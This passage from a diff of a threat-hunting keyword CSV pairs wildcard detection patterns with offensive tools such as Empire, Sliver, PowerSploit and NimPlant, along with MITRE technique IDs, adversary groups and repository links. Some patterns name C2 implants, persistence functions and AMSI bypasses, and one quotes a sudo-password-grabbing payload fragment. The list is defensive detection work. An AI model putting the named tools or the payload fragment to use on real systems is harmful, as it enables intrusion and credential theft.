Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-MailBoxExportRequest -Mailbox *@* -FilePath *.aspx*","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*new-operator --name * --lhost *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - 
T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*new-operator --name * --lhost *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*New-PSAmsiScanner -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*New-PSDrive -Name T -PSProvider FileSystem -Root \\$IP\transfer *","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*New-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-UserPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-UserPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*New-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-UserPersistenceOption*","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-UserPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*New-WmiSession.ps1*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Nexpose*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://www.rapid7.com/products/nexpose/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nextnet.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 
TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" 
@@ -14058,9 +14219,9 @@
 "*nheiniger/SnaffPoint*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z"
 "*Nick Swink aka c0rnbread*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z"
 "*nickvourd/COM-Hunter*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
-"*nickvourd/Supernova*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z"
-"*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
-"*Nightmangle-master*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z"
+"*nickvourd/Supernova*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
+"*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*Nightmangle-master*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z"
 "*nikto/program*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z"
 "*NimBlackout*.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z"
 "*NimBlackout.*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z"
@@ -14078,46 +14239,48 @@ "*nimcrypt.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*NimExec.exe*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" "*NimExec-master*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" -"*NimPlant v*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*nimplant-*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant*.tar.gz*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant*.zip*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in 
Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*nimplant.db*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant.dll*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant.nimble*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*NimPlant.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*nimplantPrint*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*nimplants-*.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*nimplants.html*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant v*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplant-*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant*.tar.gz*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant*.zip*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" 
+"*nimplant.db*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.dll*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.nimble*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplantPrint*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplants-*.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
